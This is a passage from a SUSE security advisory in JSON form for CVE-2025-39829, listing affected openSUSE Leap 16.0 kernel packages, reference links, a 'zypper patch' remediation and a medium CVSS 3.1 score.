"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39829",
"url": "https://www.suse.com/security/cve/CVE-2025-39829"
},
{
"category": "external",
"summary": "SUSE Bug 1250082 for CVE-2025-39829",
"url": "https://bugzilla.suse.com/1250082"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
